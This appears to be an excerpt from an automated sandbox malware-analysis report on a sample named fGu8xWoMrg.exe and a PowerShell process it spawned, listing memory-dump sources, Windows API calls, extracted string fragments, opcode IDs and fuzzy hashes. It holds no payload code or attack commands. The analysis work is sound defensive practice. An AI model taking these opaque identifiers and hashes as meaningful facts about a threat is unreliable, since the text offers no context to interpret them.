                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Free$GlobalLibrary
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                            • API String ID: 1100898210-823278215
                                                                                                                                                                            • Opcode ID: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
                                                                                                                                                                            • Instruction ID: 69a7d7bec05ee7f0f22c4a872385324a298b9ba4725761c8be5e054fe1390d88
                                                                                                                                                                            • Opcode Fuzzy Hash: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
                                                                                                                                                                            • Instruction Fuzzy Hash: 25E0EC3750116097C6215F45EA08B5EBBB9AF54B26F09013AE9807B27187746C428B98
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\fGu8xWoMrg.exe,C:\Users\user\Desktop\fGu8xWoMrg.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405E28
                                                                                                                                                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\fGu8xWoMrg.exe,C:\Users\user\Desktop\fGu8xWoMrg.exe,80000000,00000003), ref: 00405E38
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CharPrevlstrlen
                                                                                                                                                                            • String ID: C:\Users\user\Desktop
                                                                                                                                                                            • API String ID: 2709904686-1246513382
                                                                                                                                                                            • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                                                                            • Instruction ID: b9880c769af8d41d832fb6ed8dc33ce50b4fd52cea508e3b62d11b70b6cf9f92
                                                                                                                                                                            • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                                                                            • Instruction Fuzzy Hash: 98D0A7B3410D20AEC3126B04EC04D9F73ACFF5130078A4427F581A71A4D7785D818EEC
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
                                                                                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405F84
                                                                                                                                                                            • CharNextA.USER32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F95
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 190613189-0
                                                                                                                                                                            • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                            • Instruction ID: 4f09c4eeff833ffafa08c7ff84761216a5ad6e9a06c03d1ebffd7ec4ed62f0c5
                                                                                                                                                                            • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                            • Instruction Fuzzy Hash: 53F06231505818FFD7029FA5DD04D9EBBA8EF06254B2540AAE940F7250D678DE019BA9
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$4'eq$4'eq$4'eq$4'eq$4'eq$4ql$4ql$tLfk$tLfk$tLfk$tLfk$tLfk$tLfk$x.ek$x.ek$x.ek$-ek$-ek
                                                                                                                                                                            • API String ID: 0-1812172271
                                                                                                                                                                            • Opcode ID: 0d9b356097736ab4404d8ccc88322290da62889bfd4a67d46b18902cf89ec303
                                                                                                                                                                            • Instruction ID: 38f48a5837feacc59db0f8ae4616639e6de9bd29d47b17d4175c3e877c8130a6
                                                                                                                                                                            • Opcode Fuzzy Hash: 0d9b356097736ab4404d8ccc88322290da62889bfd4a67d46b18902cf89ec303
                                                                                                                                                                            • Instruction Fuzzy Hash: 690341B4E01214DFDB65DF68C951B9ABBB2AF85304F10C4A9D90A6B781CB31EE81CF51
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$4'eq$4'eq$4'eq$tLfk$tLfk$tLfk$tLfk$x.ek$x.ek$-ek$-ek
                                                                                                                                                                            • API String ID: 0-1047989407
                                                                                                                                                                            • Opcode ID: 36827ef8d23a0599a7571556505c44e878f58906d78b4fb762b7acb05ea1eafe
                                                                                                                                                                            • Instruction ID: 339ffca3756cc17dac50857b096be5269d135adc1e48ac1d75598841524eeac2
                                                                                                                                                                            • Opcode Fuzzy Hash: 36827ef8d23a0599a7571556505c44e878f58906d78b4fb762b7acb05ea1eafe
                                                                                                                                                                            • Instruction Fuzzy Hash: 85C252F4A016149FD764DF68C950BDABBB2AF85304F10C4A9D90A6B785CB32EE81CF51
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$4'eq$tLfk$tLfk$x.ek$-ek
                                                                                                                                                                            • API String ID: 0-2918858115
                                                                                                                                                                            • Opcode ID: 6beada1b7241745677f1890c538892472562a426f56b19844c2b3fe28279fe02
                                                                                                                                                                            • Instruction ID: 982ae2a4d1583f6e090fd5188570f62d24035dbc711fe5a2b78e17a32f19df25
                                                                                                                                                                            • Opcode Fuzzy Hash: 6beada1b7241745677f1890c538892472562a426f56b19844c2b3fe28279fe02
                                                                                                                                                                            • Instruction Fuzzy Hash: 96829EF4A01214DFDB24DF68C951BAABBB2AB85304F10C4A9D94B6B741CB71EE81CF51
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$4'eq$4'eq$tLfk$x.ek$-ek
                                                                                                                                                                            • API String ID: 0-1734575635
                                                                                                                                                                            • Opcode ID: 5a9bcd10810bcc9f55df75b140fc6a74b2da9d20064bdc60f7578737ec06ebf3
                                                                                                                                                                            • Instruction ID: a266f55331c8cf1a05e540002972293c5a8d46473d68233efc7d2ec4b94a0fa2
                                                                                                                                                                            • Opcode Fuzzy Hash: 5a9bcd10810bcc9f55df75b140fc6a74b2da9d20064bdc60f7578737ec06ebf3
                                                                                                                                                                            • Instruction Fuzzy Hash: A3827FF4A01214DFDB24DF68C951BAEBBB2AB85304F10C4A9D90A6B745CB72ED81CF51
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$4'eq$tLfk$x.ek$-ek
                                                                                                                                                                            • API String ID: 0-162867847
                                                                                                                                                                            • Opcode ID: e82d245207d8605dc5285881febcce990896483df95914a33fcccab27568fceb
                                                                                                                                                                            • Instruction ID: 517ff5ba9c2f5acc95bde2118e6583c348bcb1945982005b6ccc9cac1f8a2857
                                                                                                                                                                            • Opcode Fuzzy Hash: e82d245207d8605dc5285881febcce990896483df95914a33fcccab27568fceb
                                                                                                                                                                            • Instruction Fuzzy Hash: 2E727DB4A00215DFDB24DF68C951BAEBBB2AF85304F10C5A9D94A6B741CB32ED81CF51
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$4'eq$tLfk$x.ek$-ek
• API String ID: 0-792957894
• Opcode ID: 5ccf6f1ce937765e16b2870749bb1a0fa3b4f51a33567a56117b0da3a20f26d8
• Instruction ID: 9d5f2e53c5235e03e24873a316d83872479ff1e9d77dbcec2b4fd4e95c5ebbc2
• Opcode Fuzzy Hash: 5ccf6f1ce937765e16b2870749bb1a0fa3b4f51a33567a56117b0da3a20f26d8
• Instruction Fuzzy Hash: 16528FF4A01214DFDB24DF68C951BAEBBB2AB85304F10C4A9D94A6B741CB72ED81CF51

Strings
Memory Dump Source
• Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
Similarity
• API ID:
• String ID: (ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$4'eq$tLfk$x.ek$-ek
• API String ID: 0-792957894
• Opcode ID: 9d1e9f8ced18390ab963d80a052b43ee500526b12e65e4934f1aa673ae7d3c6e
• Instruction ID: fe19e6e4ed2bd7101647695a69f9547d1bc10b9661c7741ea636aafc8049745d
• Opcode Fuzzy Hash: 9d1e9f8ced18390ab963d80a052b43ee500526b12e65e4934f1aa673ae7d3c6e
• Instruction Fuzzy Hash: 5C4274B4A016149FD764DF68C950BDABBB2EF85304F10C4A9D50A6B785CB32EE81CF51

Strings
Memory Dump Source
• Source File: 00000002.00000002.2521835092.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_8f90000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'eq$4'eq$84rl$84rl$84rl$84rl$tPeq$tPeq$$eq$$eq$$eq
• API String ID: 0-2022112988
• Opcode ID: 7e48b950166e82e1f6d276217feb9eb234acfdee56a6ab83f08407dad97973b8
• Instruction ID: 24b31976e82364195e01ea48094a875d1ceeb90dc73d0f34174ada931b85ee8e
• Opcode Fuzzy Hash: 7e48b950166e82e1f6d276217feb9eb234acfdee56a6ab83f08407dad97973b8
• Instruction Fuzzy Hash: AF52D371F00204EFEF259F79C85166ABBA2EF85312F1580AEE8558B392DB31DD41C7A1

Strings
Memory Dump Source
• Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
Similarity
• API ID:
• String ID: (ftl$(ftl$4'eq$4'eq$4'eq$4'eq$Pi$Pi$x.ek$-ek
• API String ID: 0-3482921068
• Opcode ID: e5cfcf3b44f5da2c51b0afeb9abe28d0996cd259db3307522c6605e9e588f4d4
• Instruction ID: 661e8a96638cc1ed7bc43db09bb0dc0d272efe01c5b1b582f8a327307fe5efd7
• Opcode Fuzzy Hash: e5cfcf3b44f5da2c51b0afeb9abe28d0996cd259db3307522c6605e9e588f4d4
• Instruction Fuzzy Hash: 3DE16CF0B102059FCB14DFA8C551BAEBBA2AF89304F14C469D5066F795CB72ED82CB91

Strings
Memory Dump Source
• Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
Similarity
• API ID:
• String ID: (ftl$(ftl$(ftl$(ftl$(ftl$4'eq$4ql$tLfk$x.ek
• API String ID: 0-2298317571
• Opcode ID: 1f172057c5ffd00bf33e8cd3d6b5628369d821913ab5a94deff0e51b8356471d
• Instruction ID: bf8da793e97754c6d598a01a01fa29915d6035582c6c9baef1649191569b7f0f
• Opcode Fuzzy Hash: 1f172057c5ffd00bf33e8cd3d6b5628369d821913ab5a94deff0e51b8356471d
• Instruction Fuzzy Hash: C9122BF4F01215DFDB61DB28C951BA9B7B2AB45304F0084E9DA4AAB791CB31EE81CF51

Strings
Memory Dump Source
• Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
Similarity
• API ID:
• String ID: (ftl$4'eq$4'eq$Pi$x.ek$-ek
• API String ID: 0-2315814973
• Opcode ID: 892f2d4d35025748ad856681d30d76d7dff3a7b443461f5790b4f398beb0f237
• Instruction ID: 705d020249c091df8143426ec8c1bf84dd1ed151b5016542e68159ecb50de052
• Opcode Fuzzy Hash: 892f2d4d35025748ad856681d30d76d7dff3a7b443461f5790b4f398beb0f237
• Instruction Fuzzy Hash: E2C17DF0A002059FCB14DFA4C541BAABBB2AF89314F15C569E9066F395CB32ED81CB91

Strings
Memory Dump Source
• Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
Similarity
• API ID:
• String ID: (ftl$(ftl$(ftl$h2gk$tLfk
• API String ID: 0-3096055848
• Opcode ID: 75a7afa1c877f4d4c15723119ff00c45374b31b2b977f21d0652194774508d2d
• Instruction ID: eb452f4146780df86ab73af88658b35a2bf3aa13bd5cdd0e3e7f5075be9f590f
• Opcode Fuzzy Hash: 75a7afa1c877f4d4c15723119ff00c45374b31b2b977f21d0652194774508d2d
• Instruction Fuzzy Hash: 2261B4F0A00255DFDB34DF68C990BA9BBA2BF45304F0084AAD95B6BB51CB31AD85CB51

Strings
Memory Dump Source
• Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'eq$4'eq$4'eq$4'eq
• API String ID: 0-733111579
• Opcode ID: 941c9e611295a5b78ec4d7e5348e4ba6e4c8eaa30f38937f79a311388bfd6e99
• Instruction ID: a0272b6b34dd87366d1cfedd590cb8158cf615c657d7e55dda5c151df63e3be8
• Opcode Fuzzy Hash: 941c9e611295a5b78ec4d7e5348e4ba6e4c8eaa30f38937f79a311388bfd6e99
• Instruction Fuzzy Hash: 58F12BF1B042168FCB159B78952166BBBA2FFD5210F24C06AE507CB791DB31C986C7A2

Strings
Memory Dump Source
• Source File: 00000002.00000002.2521835092.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_8f90000_powershell.jbxd
Similarity
• API ID:
• String ID: (ftl$(ftl$Pi$Pi
• API String ID: 0-2146945663
• Opcode ID: fabca277706561b65ddb9189c1966e8ec1be349239a374135550dfe41123ec2e
• Instruction ID: 90ebf9efe1b7a0eae6161bec43fda68ffe97084afdaa2f4c64280b20ba54eb2a
• Opcode Fuzzy Hash: fabca277706561b65ddb9189c1966e8ec1be349239a374135550dfe41123ec2e
• Instruction Fuzzy Hash: 1D916AB4E00105DFDB14DFA8C541AAABBF2EF88315F14C0A9D845AB355DB36DD82CB61

Strings
Memory Dump Source
• Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
Similarity
• API ID:
• String ID: $eq$$eq$$eq
• API String ID: 0-177832560
• Opcode ID: 29fff56b1232038dee65cb86b7943cd425892670ff0aa2000cb1136367a85458
• Instruction ID: 54527b0bf4de28c8d8c1158085b23784c8b9e1d4b307d3eb4e6ea04f1aa07f8c
• Opcode Fuzzy Hash: 29fff56b1232038dee65cb86b7943cd425892670ff0aa2000cb1136367a85458
• Instruction Fuzzy Hash: B3412AF2B011269BCF649E7AC94016FBBE5AF84210B14806AD817EB381DB31D901C7D5

Strings
Memory Dump Source
• Source File: 00000002.00000002.2521835092.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_8f90000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'eq$$eq$$eq
• API String ID: 0-3012014280
• Opcode ID: 32c42a3209336eb3ecece018f6541d89d0c16669fdc848f1a5b9a73377549c26
• Instruction ID: 7fc3fa2d0975691a3027898b991d2d556432ce527572b997a6e82104619c6240
• Opcode Fuzzy Hash: 32c42a3209336eb3ecece018f6541d89d0c16669fdc848f1a5b9a73377549c26
• Instruction Fuzzy Hash: 922150B1F04205EFEF24DE79D58066AB7A6BB5421AF04806ED4A8CB259D731C941CBA1

Strings
Memory Dump Source
• Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
Similarity
• API ID:
• String ID: (ftl$(ftl
• API String ID: 0-3162476086
• Opcode ID: 1c2cd6ff142d1f2018ef25a38a2cc08f8bc1ba0e75e253d74200df582f54d311
• Instruction ID: b7523812d3e2474b14a55215751feba6817c90bc3597182f208969d2ea6d9e01
• Opcode Fuzzy Hash: 1c2cd6ff142d1f2018ef25a38a2cc08f8bc1ba0e75e253d74200df582f54d311
• Instruction Fuzzy Hash: BE427DB4B012169FDB14CFA8C541EAABBB2EF84304F15C059E9069F395CB72ED41CB91

Strings
Memory Dump Source
• Source File: 00000002.00000002.2521835092.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_8f90000_powershell.jbxd
Similarity
• API ID:
• String ID: (ftl$Pi
• API String ID: 0-1648799806
• Opcode ID: c83ba42b73a7c25638afc01a28f2115bfe059e50124c6f6ce3a00808e78096de
• Instruction ID: 0b726dae572b5777c00086ce8ceb9a0b95003f7dbbec5b5777f1ad5742e06aa0
• Opcode Fuzzy Hash: c83ba42b73a7c25638afc01a28f2115bfe059e50124c6f6ce3a00808e78096de
• Instruction Fuzzy Hash: 1F8128B4E00205DFDB14CF68C541A9ABBB2FF88315F15C0A9E845AB355DB36ED82CB61
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2521835092.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_8f90000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$4'eq
                                                                                                                                                                            • API String ID: 0-907361030
                                                                                                                                                                            • Opcode ID: c846d669a5ca02043c74c6966a607c071f3eff7be1a4f1192b67026d34567e0d
                                                                                                                                                                            • Instruction ID: 548d5974b6957ced7611e1ab3fc4c5cf3593d29586b548b2c3f3b80c52cad239
                                                                                                                                                                            • Opcode Fuzzy Hash: c846d669a5ca02043c74c6966a607c071f3eff7be1a4f1192b67026d34567e0d
                                                                                                                                                                            • Instruction Fuzzy Hash: FC414BB2F046158FDF255A78840177EBBA29FC1312B2480BFC585DB692EF35C841C7A1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2521835092.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_8f90000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$4'eq
                                                                                                                                                                            • API String ID: 0-907361030
                                                                                                                                                                            • Opcode ID: 082b20fdfb8b354cec34a78eaddc2b2d15ff7beda1c5485135a9300274fb1bee
                                                                                                                                                                            • Instruction ID: 49065ac80680adb35869bb09bf06ec45e0ebd3ad134e83085e559a481ea3fd8a
                                                                                                                                                                            • Opcode Fuzzy Hash: 082b20fdfb8b354cec34a78eaddc2b2d15ff7beda1c5485135a9300274fb1bee
                                                                                                                                                                            • Instruction Fuzzy Hash: 133148B3F00A04DBEF255EB4A40177DB352ABC0327B24806AD992DF681DF76C946C7A1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $eq$$eq
                                                                                                                                                                            • API String ID: 0-2246304398
                                                                                                                                                                            • Opcode ID: acf183947ab649752e3a825c73da39f7c19443f09442e6038e05ef4f5201f884
                                                                                                                                                                            • Instruction ID: d03a7619d035f2c91368a4d138370f9f4785bf85bf364d9a5ae223aa37a2a7f2
                                                                                                                                                                            • Opcode Fuzzy Hash: acf183947ab649752e3a825c73da39f7c19443f09442e6038e05ef4f5201f884
                                                                                                                                                                            • Instruction Fuzzy Hash: DB21F7B6906397DFCB518F7AC5401AABFF0AF4621072941ABC85AFB382D330D945C795
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: x.ek
                                                                                                                                                                            • API String ID: 0-2146835383
                                                                                                                                                                            • Opcode ID: 64936cad91c1a9df29137cbfd51931391d8eb0184d0652d06710a39052b310de
                                                                                                                                                                            • Instruction ID: b2b8e4d3a0ad37510676f1662269fc938a1b7bee6a4864c20988d9343b374508
                                                                                                                                                                            • Opcode Fuzzy Hash: 64936cad91c1a9df29137cbfd51931391d8eb0184d0652d06710a39052b310de
                                                                                                                                                                            • Instruction Fuzzy Hash: 703192B0B41114ABD714ABA8C911FAF7AA3EF85300F14C028E9026F3D5CF76AD818BD1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2521835092.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_8f90000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq
                                                                                                                                                                            • API String ID: 0-1552367303
                                                                                                                                                                            • Opcode ID: 687dc32cd4bcbb2c6aa58d42a6d5d3e021da3b4249e3a23fbefc25cadde0ccf7
